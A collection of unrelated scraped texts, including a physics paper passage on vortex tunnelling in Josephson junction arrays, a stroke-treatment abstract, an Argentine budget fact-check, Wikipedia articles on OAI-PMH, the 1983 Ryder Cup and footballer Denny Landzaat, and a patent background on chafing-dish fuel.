\partial_t n_v=\Gamma -\frac{\xi^2}{\tau_{rec}}n_v^2.\end{aligned}$$ Here $\Gamma$ denotes the rate of generation of free vortices, while the second term on the rhs of (\[eq:decayrate\]) describes their recombination, $\tau_{rec}$ denotes the recombination parameter. The steady state value $n_v=(\tau_{rec}\Gamma)^{1/2}/\xi$ of the vortex density determines the current-voltage relation.
In order to determine $\Gamma$, we consider the appearance of a vortex-antivortex pair and its subsequent separation via tunneling or thermal activation under the influence of the external force $\mathbf{f}$. In the clean case this process is symmetric, i.e., the coordinates of the vortex ${{\mathbf r}}_1$ and the antivortex ${{\mathbf r}}_2$ satisfy ${\bf r}_1=-{\bf r}_2={{\mathbf r}}$ with ${\mathbf {f}\cdot
\bf{r}}=f r$. The action of the vortex pair can be rewritten as $$\begin{aligned}
&S=\int d\tau \left[M(\partial_{\tau}r)^2+U(r)\right ],\end{aligned}$$ where $U(r)=2 \pi J \ln{\left( \frac{2r}{\xi} \right)}-2 f r+2 E_c$. The problem effectively reduces to a single particle motion through one-dimensional potential barrier $U(r)$ [@footnote1].
The rate $\Gamma$ is given by [@Affleck81] $$\label{eq:Gamma-T}
\Gamma\sim \int_{0}^{\infty} dE \;\Gamma(E)e^{-E/T},$$ where $\Gamma(E)$ denotes the zero temperature tunneling rate of a particle in the potential $U(r)$ having an energy $E$. For low temperatures and hence $E$ smaller than the barrier height $U_0=2\pi J\left[\ln(\frac{2\pi J}{f\xi})-1\right]+2E_c$, $\Gamma(E)$ in the WKB approximation is $$\begin{aligned}
\Gamma(E)= e^{-4\sqrt{M}\int_{r_a(E)}^{r_b(E)}d r\sqrt{U(r)-E}/\hbar},\end{aligned}$$ where $r_{a/b}(E)$ satisfy $U(r_{a/b})=E$ (see Fig. \[fig:potential\]).
![Potential barrier for the separation of the vortex-antivortex pair.[]{data-label="fig:potential"}](potential.eps){width="0.7\columnwidth"}
In the following different regimes will be considered.\
(i)At zero temperature the only contribution in Eq. (\[eq:Gamma-T\]) comes from $E=0$. The generated voltage for small currents ($f\xi/J\ll 1$) is $$\begin{aligned}
&V\sim\Gamma^{1/2}\sim e^{-S(0,0)/2\hbar}\notag\\
&\frac{S(0,0)}{\hbar}\approx c_1\frac{\sqrt{M}(2J\pi)^{3/2}}{\hbar f}{\left(\ln{\frac{2J\pi}{f\xi}}\right)}^{3/2}.\end{aligned}$$ $c_1$ is a positive constant of the order of unity and $$\begin{aligned}
\frac{S(E,T)}{\hbar}=\frac{E}{T}+4\sqrt{M}\int_{r_a(E)}^{r_b(E)}d r\frac{\sqrt{U(r)-E}}{\hbar}\end{aligned}$$ is the action of the classical path of the particle in the potential $-U(r)$ with the energy $E$ and mass $2M$. The result (\[eq:quantum\]) is in an agreement with that of Ref. [@Iengo+96] where it is obtained using the different technique [@footnote2]. We find that the result (\[eq:quantum\]) holds also at finite temperatures as long as $$\begin{aligned}
T\leq T_0=\frac{1}{c_2}\frac{\hbar f}{\sqrt{\pi 2J M}}\frac{1}{\sqrt{\ln{\frac{\pi 2J}{f\xi}}}},\end{aligned}$$ where $c_2$ is positive constant of the order of unity.\
(ii) At intermediate temperatures $T_0<T<T^*$, where $$\begin{aligned}
f}{2\pi}\sqrt{\frac{1}{M J \pi}},\end{aligned}$$ the main contribution in Eq. (\[eq:Gamma-T\]) comes from the stationary point $E_T$. Therefore, $V\sim \exp \left [ -S(E_T,T)/2\hbar \right ]$. $E_T$ depends on the temperature and is implicitly given by the equation $$\begin{aligned}
\frac{\hbar}{T}=2\sqrt{M}\int_{r_a(E_T)}^{r_b(E_T)}d r
\frac{1}{\sqrt{U(r)-E_T}}=\tau(E_T),\end{aligned}$$ where $\tau(E)$ can be interpreted as the period of the classical motion of a particle with the mass $2M$ and energy $E$, in the potential $-U(r)$. Since $\tau(E)$ is the monotonically decreasing function of $E$ for small currents, Eq. (\[eq:finiteT\]) has the unique solution $E_T$ for every $T$ in a range $T_0\leq T\leq
T^*$. We come back to the discussion of the voltage characteristic in this regime below.\
(iii)At even higher temperatures $T^*< T \leq T_{\mathrm{BKT}}$, the decay rate is dominated by $E>U_0$ [@Goldanskii; @Affleck81] and the thermally activated breaking of vortex pairs dominates the dynamics. Then, the decay rate is given by the Arrhenius law $\Gamma\sim \exp[-S_{class}/ \hbar]$ where $S_{class}=\hbar U_0/T$. The voltage-current relation reads [@HN; @Doniah+79] $$\begin{aligned}
V\sim f e^{-U_0/(2T)} \sim j^{\delta(T)},\quad\quad \delta(T)=1+{\pi J}/{T}.\end{aligned}$$ Taking into account the presence of other vortices by replacing $J\to \widetilde{J}$, the coefficient assumes a universal value $\delta(T_{BKT})=3$.\
(iv) At $T>T_{\mathrm{BKT}}$ a finite density of free vortices appears in an equilibrium, and the system is characterized by a linear current-voltage relation for small enough currents.
![Dynamic phase diagram in current-temperature coordinates showing different types $V(j,T)$ dependencies for $T<T_{BKT}$. The dashed and the solid lines sketch $T_0(j)$ and $T^*(j)$, respectively. In the domain $T<T_0$ quantum tunneling of vortices dominates the vortex dynamics, while at $T>T^*$ the voltage-current characteristics is determined by the thermally activated motion. In the shaded region the quantum correction to the classical result, given by Eq. (\[eq:correction\]), applies.[]{data-label="Fig:regions"}](regimes.eps){width="0.8\linewidth"}
Next, we consider crossover from the quantum- ($T\leq T_0$) to the classical regime ($T>T^*$) in more detail. Within the semiclassical approximation the decay rate is given, with the exponential accuracy, by $\Gamma\sim \exp[-S_{\mathrm{min}}/\hbar]$, where $S_{\mathrm{min}}$ is the action of the trajectory minimizing the Euclidean action of Eq. (\[ch2\_eq:action\]). For temperatures below $T_0$ the extremal action is $S_{\mathrm{min}}=S(0,0)$, in the intermediate region ($T_0<T<T^*$) the minimal action is $S_{\mathrm{min}}=S(E_T,T)$, and in the high temperature regime the trajectory extremizing the action is time independent, and therefore $S_{\mathrm{min}}=\hbar U_0/T$. We find that $S_{\mathrm{min}}$ at $T^*$ has a continuous first derivative with respect to temperature, while the second derivative has a jump: $$\begin{aligned}
&\frac{{{\mathrm d}}S(E_T,T)}{{{\mathrm d}}T}\Big|_{T^*}=\frac{{{\mathrm d}}S_{\mathrm{class}}}{{{\mathrm d}}T}\Big|_{T^*}\notag\\ &\frac{{{\mathrm d}}^2 S(E_T,T)}{{{\mathrm d}}T^2}\Big|_{T^*} < \frac{{{\mathrm d}}^2 S_{\mathrm{class}}}{{{\mathrm d}}T^2}\Big|_{T^*}.\end{aligned}$$ Following Ref. [@Larkin+83] we call this situation a second-order transition at the crossover point [@footnote3]. The result of Eqs. (\[ch2\_eq:secondorder\]) is a general property of a massive particle trapped in a metastable state formed by a potential $U(r)$, provided $\tau(E)$ is a monotonously decreasing function of energy [@Chudnovsky92].
Generally, in the case of a second-order transition the trajectory extremizing the action can be written as [@Larkin+83] $$\begin{aligned}
r(\tau)=r_c+\sum_{n=1}^{\infty}a_n \cos{\left( \frac{2\pi
T}{\hbar}n \tau\right)},\end{aligned}$$ where the coefficients $|a_n|\ll |a_1|$ ($n>1$) are small near the transition temperature $T^*$. Substituting $r(\tau)$ in Eq. (\[ch2\_eq:action\]), the action can be expanded in powers of $a_n$, yielding an effective action $
S\approx {U_0\hbar}/{T}+\alpha a_1^2+\beta a_1^4,
$ where the coefficient $\alpha$ is negative below $T^*$ and vanishes at the transition temperature $T^*$ [@Larkin+83]. Then the coefficient $a_1$ can be found from the minimization of the action $S$ and the minimal action is $
$ Following Refs. [@Larkin+83], we determine the coefficients $\alpha$ and $\beta$ and find a quantum correction to the classical result of Eq. (\[ch2\_eq:VIclassical\]) $$\begin{aligned}
V&\sim j^{\delta(T)} e^{\Delta},\notag\\
\Delta & =
\frac{(T^2-T^{*2})^2}{T T^{*^3}} \frac{\sqrt{M J^3} }{\hbar f} \frac{\pi^{5/2}}{1+2(1-4(T/T^*)^2)^{-1}} .\end{aligned}$$ This result is valid near the transition, for temperatures approaching $T^*$ from below, see Fig. \[Fig:regions\]. We conclude that quantum effects significantly enhance the decay rate in comparison to the classical rate for the asymptotically small currents. It would be interesting to probe the result of Eq. (\[eq:correction\]) in experiments.\
*Disordered case*. Next we include disorder into the consideration, in the limit $C\to \infty$. The phase shifts are assumed to be uncorrelated from bond to bond, and each is Gaussian distributed with the mean value and the variance $$\label{eq:A}
\overline {A_{ij}} = 0,\quad\quad\overline {A_{ij}^2} =\sigma,$$ respectively. Then, an additional term $\sum _i m_iV({\bf r}_i)$ is generated in (\[eq:H\_v\]), where $V({\bf r}_i)=2\pi J\sum_j Q_j\ln(|
{\bf r}_{i}-{\bf r}_{j}| / \xi)$. $Q_i=(1/2\pi)\sum_{<plaq>} A_{ij}$ are the frozen charges sitting on the dual lattice in the center of a plaquette whereas the sum is over a plaquette formed by 4 bonds. From (\[eq:A\]) follows $\overline{(V({\bf r}_i)-V({\bf r}_j))^2}=4\pi\sigma J^2\ln (| {\bf r}_{i}-{\bf r}_{j}|/ \xi)$.
It was shown in Ref. [@Na+_95], that the system in the classical case, at $T = 0$ undergoes a disorder driven transition from the ‘ordered’ BKT state to a disordered phase at the critical disorder strength $\sigma_c=\pi/8$. In the ordered BKT phase vortices appear, on average, only in a form of the bound pairs. Indeed, the energy of a vortex pair with the separation $R$ and $m_1=-m_2=1$ in a clean sample is given by $2 \pi J \ln (R/ \xi)$. Since $V({\bf r}_i)$ is Gaussian distributed, the typical energy gain is $-2J \sqrt {\pi \sigma \ln(R/ \xi)}$ which is smaller by a factor $\sim (\ln (R/\xi))^{-1/2}$ than the energy cost of a pair. However, the maximum energy gain of a vortex dipole in a region of linear size $L>R$ is larger by a factor $\sqrt{2\ln N}$ than the typical energy gain, which arises from the $N$ independent realizations of the vortex positions [@KoNa_96]. The disorder potential, that one vortex-antivortex pair of size $R+dR$ feels, is uncorrelated when the pair is translated over a distance larger than $R$ [@LHT96]. Therefore, we introduce a lattice with a lattice constant $R$. Since also the correlations of disorder potential inside the cell give only subleading-order corrections [@LHT96], we estimate $N\approx (L/R)^2 (R/\xi)^2 (2\pi R/\xi) dR/\xi$. For $dR\approx R$, we get the free energy of the pair at $T=0$ $$\begin{aligned}
E\approx 2\pi J \ln{\frac{R}{\xi}}\left[1-\sqrt{\frac{4\sigma}{\pi} \frac{\ln{(L R/ \xi^2)}}{\ln{(R/\xi)}}}\right].\end{aligned}$$ Thus, if $R\approx L$, the total energy of the coresponding vortex pair becomes negative and free vortices are favored by disorder provided $\sigma
>\sigma_c=\pi/8$, in an agreement with the renormalization group result in Ref. [@Na+_95]. Note that strictly speaking these vortices are “pseudo-free" since despite the fact that their attraction is overruled by disorder, they remain pinned by the same disorder-induced forces. It follows from the above reasoning that even for $\sigma<\sigma_c$ some rare vortex pairs of the negative energy can appear. From (\[eq:pairenergy\]) we get that their maximal size is $R_c\approx \xi (L/\xi)^{\frac{1}{2\sigma_c/\sigma-1}}$, which reaches the size of the system for $\sigma\to \sigma_c-0$, as expected. Typically there is a single dipole of the size $R_c$ in the system. If we divide the system into $M^2$ subsystems, each part will contain a dipole of the maximum size $R_{M}
\approx R_c M^{-{\frac{1}{2\sigma_c/\sigma-1}}}$. The density of dipoles of the size $R_M$ is $\xi^{-2}(R_M/ \xi)^{2(1-2\sigma_c/\sigma)}$ at $T=0$, in agreement with Ref. [@LHT96].
We further determine the critical current. If the transport current is strong enough, it will depin vortices such that the dissipation sets in. A crude estimate for the critical depinning force at $T=0$ and $\sigma<\sigma_c$ is given by $$\label{eq:criticalforce}
f_c\sim \frac{J}{R_c} \sim \frac{J}{\xi}\left(\frac{L}{\xi}\right)^{\frac{-1}{2\sigma_c/\sigma-1}},$$ since smaller dipoles are depinned at larger forces. The influence of disorder on the voltage-current relation is left for further studies.
*Conclusion.* We have investigated transport properties of Josephson junction arrays taking into account the influence of quantum fluctuations on the unbinding of vortex pairs for $E_c\ll J$. At sufficiently low temperatures the quantum tunneling of vortices turns out to be more probable than their thermal activation. We have derived the $V$-$I$ relation corresponding to the quantum creep of the BKT-vortices and found the range of temperatures, $0\leq T\leq T_0$, where this law is applicable. We have determined the temperature $T^*$ above which the thermally activated breaking of vortex pairs dominates the vortex nucleation. We have discussed the region of intermediate temperatures $T_0<T<T^*$ where a crossover from classical to quantum behavior occurs, and found the quantum correction to the classical result, see Eq. (\[eq:correction\]). The results are schematically summarized in Fig. \[Fig:regions\] and can be straightforwardly extended to the quantum limit $E_c\gg J$, where the transport is mediated by the motion of charges dual to the superconducting vortices, via the standard dual transformation. Moreover, in the presence of positional disorder and for $C\to \infty$, we have shown that additional vortices generated by the disorder contribute to transport, effectively reducing the critical current as compared to that in a clean system.
We are delighted to thank R. Fazio and Z. Ristivojevic for useful discussion. This work was supported by the U.S. Department of Energy Office of Science through contract No. DE-AC02-06CH11357; authors like to acknowledge the support from the SFB 608 (AP and TN) and the AvH foundation (VMV).
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E.Granato and J.M.Kosterlitz, Phys. Rev. B [**33**]{}, 6533 (1986).
R.Fazio and G.Sch" on, Phys. Rev. **B 43**, 5307 (1991).
M.Tinkham, “*Introduction to Superconductivity*” Dover publications 2004.
J.Bardeen and M.J.Stephen, Phys. Rev. [**140**]{} 1197A (1965).
I.Affleck, Phys. Rev. Lett. **46**, 388 (1981).
R.Iengo and G.Jug, Phys. Rev. B [**54**]{}, 13207 (1996).
V.I.Goldanskii, Dokl. Acad. Nauk SSSR **124**, 1261 (1959) \[Sov. Phys. Dokl. **4**,74 (1959)\].
S.Doniach and B.A.Huberman, Phys. Rev. Lett. [**42**]{}, 1169 (1979).
A.I.Larkin and Yu.N.Ovchinnikov, JETP Lett. [**37**]{}, 382 (1983), Sov. Phys. JETP [**59**]{}, 2 (1984).
E.M.Chudnovsky, Phys. Rev. A [**46**]{}, 8011 (1992).
L.-H.Tang, Phys. Rev. B [**54**]{}, 3350 (1996).
| {
"pile_set_name": "ArXiv"
} |
Response of blood pressure and blood glucose to treatment with recombinant tissue-type plasminogen activator in acute ischemic stroke: evidence from the virtual international stroke trials archive.
Elevations in blood pressure (BP) and blood glucose are common during stroke and may represent a stress response secondary to the acute neurological deficit. If so, they should settle more completely in recombinant tissue-type plasminogen activator (rtPA)-treated patients in association with improved neurological status. We performed a controlled comparison of 24-hour declines in BP and glucose in rtPA-treated and control patients from the Virtual Stroke International Stroke Trial Archive (VISTA) database. Twenty-four-hour falls in BP and glucose were compared using multiple regression to account for baseline imbalances. The logarithmic transformation of glucose was used and 24-hour differences expressed as ratios of 24 hours to admission geometric means. Two-way analysis of variance was used to test for interaction between rtPA and early improvement for 24-hour falls in BP and blood glucose. BP analysis included 5406 patients (rtPA=41%) and glucose analysis 4288 (rtPA=37%). rtPA-treated patients were younger, less likely to have a history of hypertension or diabetes, and had more severe strokes on admission. BP and glucose were lower at baseline in rtPA-treated patients than control subjects. On regression, rtPA predicted significantly greater 24-hour falls in systolic BP (β=3.9; 95% CI, 2.8-5.0), diastolic BP (β=3.1; 95% CI, 2.4-3.9), and glucose (β=0.97; 95% CI, 0.95-0.99). rtPA did not interact with early neurological improvement for 24-hour falls in systolic BP (P=0.72), diastolic BP (P=0.79), or blood glucose (P=0.51). A stress response does not appear to be the principal cause of elevations in BP and glucose during stroke. | {
"pile_set_name": "PubMed Abstracts"
} |
Kitchen Recipes Book
Kitchen Recipes Book: It's all about Recipes, here you find all types of recipes all over the world. This is the gateway to all your favorite Unique Recipes. | {
"pile_set_name": "OpenWebText2"
} |
Hunters of the Golden Age
The period 30,000 to 20,000 BP can be aptly called the `Golden Age' of hunter gatherers for a variety of reasons, spelled out in great detail by the 37 contributors to this impressive volume. In this period we find the first unambiguous burials after the Middle Palaeolithic, the earliest bona fide habitation structures and an unprecedented sophistication in raw material requirements which involved provisioning strategies over hundreds of kilometres. The volume deals at great length with many facets of the complex record of the period, with contributions on ecology, dating and the physical anthropology of the Mid Upper Palaeolithic population preceding a large number of papers dealing with archaeological issues, organized in a topical and a regional presentation. The book is the third and final volume in a series initiated by the European Science Foundation Network on the Palaeolithic Occupation of Europe. | {
"pile_set_name": "Pile-CC"
} |
Proclaim 18, NRB’s 75th annual convention, is coming very soon to Nashville, and anyone interested in communicating freely online should be sure to attend the Public Policy Session on Thursday, March 1.
Scattered throughout the four days of Convention are affiliate events hosted and organized by various organizations. While some are by invitation only, others are ticketed events, and some are open to the public.
For the 26th year in a row, Movieguide: The Family Guide to Movies and Entertainment concluded in its Annual Report to the Entertainment Industry that moviegoers “clearly” prefer relatively clean, heroic, family-friendly movies with Christian, biblical, redemptive, conservative, and patriotic faith and values.
National Religious Broadcasters (NRB) is a unique gathering of people, united by purpose and message: to proclaim the Good News of eternal life through Jesus Christ; to transform culture through the application of sound biblical teaching; and to advance biblical truth, to promote media excellence, and to defend free speech. | {
"pile_set_name": "Pile-CC"
} |
¡Atención! Este artículo tiene más de un año y puede contener datos desactualizados 06 Septiembre, 2019 15:05 pm | Tiempo de lectura: 1 minuto Atención! Este artículo tiene más de un año y puede contener datos desactualizados 06 Septiembre, 2019 15:05 pm | Tiempo de lectura: 1 minuto
Si tenés sólo unos segundos, leé estas líneas:
El porcentaje destinado a la Seguridad Social es la parte más importante del presupuesto nacional.
Pero la mayoría son jubilaciones y pensiones, no programas sociales.
La asistencia social, que incluye diversos tipos de planes y becas, representa alrededor del 5% del presupuesto.
El senador y candidato a vicepresidente por Juntos por el Cambio, Miguel Ángel Pichetto, criticó las protestas de las organizaciones sociales en una entrevista con radio La Red y señaló que “es una de las causas del endeudamiento público, mantener el sistema de seguridad social en la Argentina. 65% del total del presupuesto está comprendido ahí: en planes, piqueteros, cooperativas de la pobreza, cartoneros, multinacionales del cartón, en fin”.
La Seguridad Social en la Argentina representa efectivamente un porcentaje alto del presupuesto nacional, es el 49% (aunque alcanza el 60% si no se incluye lo que está previsto pagar de deuda pública ese año), pero la gran mayoría se destina a las jubilaciones y pensiones, no a los programas sociales, como sugirió Pichetto.
Las jubilaciones representan el 34% del presupuesto y son el gasto más importante del gobierno nacional. Para 2019 está planificado un gasto de $1,4 billones en prestaciones previsionales. Los diferentes programas sociales, en cambio, suponen montos muchos menores. La promoción y asistencia social representa el 1,82% del presupuesto. Esto incluye a los programas que manejan el Ministerio de Salud y Desarrollo Social, la Agencia Nacional de Discapacidad y el Instituto Nacional de Asociativismo y Economía Social, entre otros organismos.
Si a eso se suma el presupuesto destinado a la Asignación Universal por Hijo, que no está incluida en el ítem ya que depende de Anses, el total llega a 4,7% del presupuesto, muy por debajo del monto señalado por el senador y candidato.
“La parte más importante del presupuesto es el gasto público social, que incluye educación, salud, asistencia social, y lo más fuerte es la parte de seguridad social, específicamente lo que tiene que ver con jubilaciones y pensiones”, explicó a Chequeado Rafael Flores, especialista de la Asociación Argentina de Presupuesto (ASAP).
El gasto público social creció como parte del presupuesto en 2019 en relación a 2018, en parte porque varios de estos gastos, como las jubilaciones, están fijados por ley y no se pueden modificar, por lo que los gastos se mantienen a pesar de que el presupuesto general se achicó en términos reales, por lo que su participación aumentó (como se explica en esta nota). Lo mismo pasó contra 2015: el gasto social representa más en proporción al presupuesto, porque el gasto total cayó.
Temas | {
"pile_set_name": "OpenWebText2"
} |
Open Archives Initiative Protocol for Metadata Harvesting
The Open Archives Initiative Protocol for Metadata Harvesting (OAI-PMH) is a protocol developed for harvesting metadata descriptions of records in an archive so that services can be built using metadata from many archives. An implementation of OAI-PMH must support representing metadata in Dublin Core, but may also support additional representations.
The protocol is usually just referred to as the OAI Protocol.
OAI-PMH uses XML over HTTP. Version 2.0 of the protocol was released in 2002; the document was last updated in 2015. It has a Creative Commons license BY-SA.
In the late 1990s, Herbert Van de Sompel (Ghent University) was working with researchers and librarians at Los Alamos National Laboratory (US) and called a meeting to address difficulties related to interoperability issues of e-print servers and digital repositories. The meeting was held in Santa Fe, New Mexico, in October 1999. A key development from the meeting was the definition of an interface that permitted e-print servers to expose metadata for the papers it held in a structured fashion so other repositories could identify and copy papers of interest with each other. This interface/protocol was named the "Santa Fe Convention".
Several workshops were held in 2000 at the ACM Digital Libraries conference and elsewhere to share the ideas from the Santa Fe Convention. It was discovered at the workshops that the problems faced by the e-print community were also shared by libraries, museums, journal publishers, and others who needed to share distributed resources. To address these needs, the Coalition for Networked Information and the Digital Library Federation provided funding to establish an Open Archives Initiative (OAI) secretariat managed by Herbert Van de Sompel and Carl Lagoze. The OAI held a meeting at Cornell University (Ithaca, New York) in September 2000 to improve the interface developed at the Santa Fe Convention. The specifications were refined over e-mail.
OAI-PMH version 1.0 was introduced to the public in January 2001 at a workshop in Washington D.C., and another in February in Berlin, Germany. Subsequent modifications to the XML standard by the W3C required making minor modifications to OAI-PMH resulting in version 1.1. The current version, 2.0, was released in June 2002. It contained several technical changes and enhancements and is not backward compatible.
The OAI Protocol was adopted by many digital libraries, institutional repositories, and digital archives. Although registration is not mandatory, it is encouraged.
There are several large registries of OAI-compliant repositories:
The Open Archives list of registered OAI repositories
The OAI registry at University of Illinois at Urbana-Champaign
The Celestial OAI registry
Eprint’s Institutional Archives Registry
Openarchives.eu The European Guide to OAI-PMH compliant repositories in the world
ScientificCommons.org A worldwide service and registry
Finna.fi the material library of Finnish archives, libraries and museums
Some commercial search engines use OAI-PMH to acquire more resources. Google initially included support for OAI-PMH when launching sitemaps, however decided to support only the standard XML Sitemaps format in May 2008. In 2004, Yahoo! acquired content from OAIster (University of Michigan) that was obtained through metadata harvesting with OAI-PMH. Wikimedia uses an OAI-PMH repository to provide feeds of Wikipedia and related site updates for search engines and other bulk analysis/republishing endeavors. Especially when dealing with thousands of files being harvested every day, OAI-PMH can help in reducing the network traffic and other resource usage by doing incremental harvesting. NASA's Mercury metadata search system uses OAI-PMH to index thousands of metadata records from Global Change Master Directory (GCMD) every day.
The mod_oai project is using OAI-PMH to expose content to web crawlers that is accessible from Apache Web servers.
OAI-PMH is based on a client–server architecture, in which "harvesters" request information on updated records from "repositories". Requests for data can be based on a datestamp range, and can be restricted to named sets defined by the provider. Data providers are required to provide XML metadata in Dublin Core format, and may also provide it in other XML formats.
A number of software systems support the OAI-PMH, including Fedora, EThOS from the British Library, GNU EPrints from the University of Southampton, Open Journal Systems from the Public Knowledge Project, Desire2Learn, DSpace from MIT, HyperJournal from the University of Pisa, Digibib from Digibis, MyCoRe, Primo, DigiTool, Rosetta and MetaLib from Ex Libris, ArchivalWare from PTFS, DOOR from the eLab in Lugano, Switzerland, panFMP from the PANGAEA (data library), SimpleDL from Roaring Development, and jOAI.
A number of large archives support the protocol including arXiv and the CERN Document Server.
A dedicated workshop, The CERN Workshop on Innovations in Scholarly Communication, has been held at CERN in Geneva on a regular basis since 2001. It is now co-organised by University of Geneva and CERN every two years in June. OAI8 was held on June 19th-21st, 2013; OAI9 was held on June 17–19, 2015; and OAI10 was held on June 21 to 23, 2017.
See also
Data format management
Digital curation
Digital preservation
File format
Dublin Core, an ISO metadata standard
National Digital Information Infrastructure and Preservation Program (NDIIPP)
National Digital Library Program (NDLP)
Metadata Encoding and Transmission Standard (METS) maintained by the Library of Congress
Preservation Metadata: Implementation Strategies (PREMIS)
Search as a service
Web archiving
External links
Suleyman Demirel University Open Archives Harvester
Protocol specification
National Library of Congress, Digital Collections and Programs
Library of Congress, National Digital Information Infrastructure and Preservation Program
Library of Congress, Web Capture
Category:Online archives
Category:Internet protocols
Category:Open access projects
Category:Archival science
de:OAI-PMH | {
"pile_set_name": "Wikipedia (en)"
} |
1983 Ryder Cup
The 25th Ryder Cup Matches were held October 14–16, 1983 at the PGA National Golf Club in Palm Beach Gardens, Florida.
The United States team won the competition by a score of 14½ to 13½ points, the closest Ryder Cup since the tie in 1969. In their third competition with players from the continent, Europe showed the ability to realistically challenge the Americans. This was the first of four occasions that Tony Jacklin was the European captain and the sole occasion that his side lost.
Entering the singles matches on Sunday, the competition was even at 8 points each. Jacklin put his best players out early, while U.S. captain Jack Nicklaus saved his for last. In the first match, Seve Ballesteros was 3 up at the turn but needed an outstanding 3-wood from a fairway bunker on the final hole to salvage par and force a half with Fuzzy Zoeller. With ten matches complete and the score at 13 points each, the outcome depended on the two singles matches remaining on the course, between José Maria Cañizares and Lanny Wadkins and Bernard Gallacher and Tom Watson. The U.S. victory is generally accredited to Wadkins, who hit a wedge to less than three feet (0.9 m) on the par-5 18th hole to win the hole with a birdie and halve his match against Canizares. Gallacher had trailed all day, but Watson bogeyed 16 and was only 1 up with two holes to play. He had another bogey at the par-3 17th, but Gallacher's three-foot putt for bogey missed and ended the match at 2 & 1 and gave the U.S. the winning point.
This was the thirteenth consecutive win at home for the U.S. team, but they have yet to post consecutive home victories since, alternating losses and wins for a 4-4 record through 2016. It was also the last victory for the U.S. in the Ryder Cup for eight years, until 1991.
The Ryder Cup is a match play event, with each match worth one point. The competition format in 1983 was as follows:
Day 1 — 4 foursome (alternate shot) matches in a morning session and 4 four-ball (better ball) matches in an afternoon session
Day 2 — 4 four-ball matches in a morning session and 4 foursome matches in an afternoon session
Day 3 — 12 singles matches
With a total of 28 points, 14½ points were required to win the Cup. All matches were played to a maximum of 18 holes.
The American qualification rules remained unchanged from 1981 with 11 of the team being selected from a points list. The final place in the team was allocated to the winner of the 1983 PGA Championship (which finished on August 7), provided he was not in the top 11, in which case the 12th player in the points list would qualify. Qualification based on the points list finished after the Western Open on July 3. Tom Watson needed to win the final event to guarantee his place but finished second, lifting him from 14th to 12th place in the points list and pushing Hale Irwin out of that position. The PGA Championship was won by Hal Sutton with Jack Nicklaus second. Sutton was only in his third year as a professional and hence ineligible and so Watson retained his place on the team.
The European team was chosen entirely from the 1983 European Tour money list as at the conclusion of the St. Mellion Timeshare TPC on September 18. Prior to the final event 10 of the players had guaranteed their places with Manuel Piñero in 11th position and Gordon J. Brand in 12th. Brand made sure of his place with fifth place in the TPC but Piñero was overtaken by Paul Way who finished second to lift him to 11th place in the list.
Friday's matches
October 14, 1983
Morning foursomes
Afternoon four-ball
Saturday's matches
October 15, 1983
Morning four-ball
Afternoon foursomes
Sunday's singles matches
October 16, 1983
Individual player records
Each entry refers to the Win–Loss–Half record of the player.
United States
2012 Ryder Cup Ryder Cup Flashback: 1983
External links
PGA of America: 1983 Ryder Cup
About.com: 1983 Ryder Cup
Category:Ryder Cup
Category:Golf in Florida
Category:Sports competitions in Florida
Category:Sports in Palm Beach County, Florida
Ryder Cup
Ryder Cup
Ryder Cup
Ryder Cup | {
"pile_set_name": "Wikipedia (en)"
} |
Denny Landzaat
Denny Domingues Landzaat (known as Denny Landzaat, , born 6 May 1976) is a Dutch former footballer who mostly played as a defensive midfielder.
Early life
Landzaat was born and raised in Amsterdam. He is of Moluccan descent.
Club career
Early career
Landzaat was educated in Ajax's youth academy, but only played one league match for the club before moving on to have lengthy spells with MVV, Willem II and AZ. He was AZ's captain in the 2005–06 season, as they finished second in the Eredivisie.
Wigan Athletic
Landzaat joined Premier League club Wigan Athletic on 18 July 2006 for an undisclosed fee, thought to be £2.5 million. He signed a three-year contract with the club. He scored his first goal for Wigan against Reading in a 2–3 loss on 30 January 2007. He followed this with a 30-yard strike at the Emirates Stadium in a 1–2 defeat to Arsenal on 11 February. On 18 August 2007, Landzaat converted a penalty against Sunderland to score his first home goal for Wigan at the JJB Stadium. He also scored the first goal in Wigan's 5–3 win over local rivals Blackburn Rovers.
On 25 January 2008, Landzaat returned to the Netherlands to join Feyenoord for a £1 million transfer fee. He signed a three-and-a-half-year contract with the club. He scored his first goal for Feyenoord on his debut, in the 3–3 draw against Heracles on 24 February 2008.
After his contract with Feyenoord expired, Landzaat signed a one-year deal with Twente in August 2010, which was extended during the season and again in the following season. He won the KNVB Cup in 2010–11.
Willem II
After his contract with Twente expired in the summer of 2013, Landzaat was unable to find a new team for the start of the 2013–14 season. However, on 16 January 2014, he signed a contract with Willem II until the end of the season. He retired from professional football at the end of the season, having been a part of the team that helped Willem II back to the Eredivisie.
International career
Landzaat was a member of the Dutch squad at the 1995 FIFA World Youth Championship. Landzaat also competed in the 2006 World Cup. On 21 May 2008, Landzaat was released from Marco van Basten's UEFA Euro 2008 provisional squad.
Career statistics
Statistics accurate as of last match played on 17 March 2014.
Eredivisie: 1995–96
Eerste Divisie: 1996–97
KNVB Cup: 2007–08
KNVB Cup: 2010–11
Johan Cruyff Shield: 2010
Willem II
Eerste Divisie: 2013–14
External links
Denny Landzaat at Voetbal International –
Category:1976 births
Category:Living people
Category:Expatriate footballers in England
Category:Dutch footballers
Category:Dutch people of Indonesian descent
Category:Dutch people of Moluccan descent
Category:Dutch expatriate footballers
Category:Netherlands youth international footballers
Category:Netherlands international footballers
Category:AFC Ajax players
Category:Willem II (football club) players
Category:AZ Alkmaar players
Category:MVV Maastricht players
Category:Wigan Athletic F.C. players
Category:Feyenoord players
Category:FC Twente players
Category:2006 FIFA World Cup players
Category:Eredivisie players
Category:Eerste Divisie players
Category:Premier League players
Category:Footballers from Amsterdam
Category:Indo people
Category:Dutch expatriate sportspeople in England
Category:Association football midfielders | {
"pile_set_name": "Wikipedia (en)"
} |
1. Field of the Invention
This invention relates generally to a self-contained device for generating heat through combustion of a non-pressured, high flash point fuel (>100.degree. F.) utilized primarily for heating food and the like. More particularly, this invention pertains to a closed cartridge containing a reservoir of a novel high percentage glycol or glycol derivative fuel and a non-consumable wick immersed in the fuel reservoir to provide controllable means for combusting said glycol or glycol derivative. These devices are commonly found in applications utilizing chafing dishes where food is to be maintained at an elevated termperature for extended periods of time.
2. Description of the Prior Art
Restaurants and others involved in the food preparation industry typically have a requirement for maintaining various foodstuffs at an elevated temperature for extended periods of time to maintain said food's edibility as well as to preserve the food from infection by exogenous microorganisms.
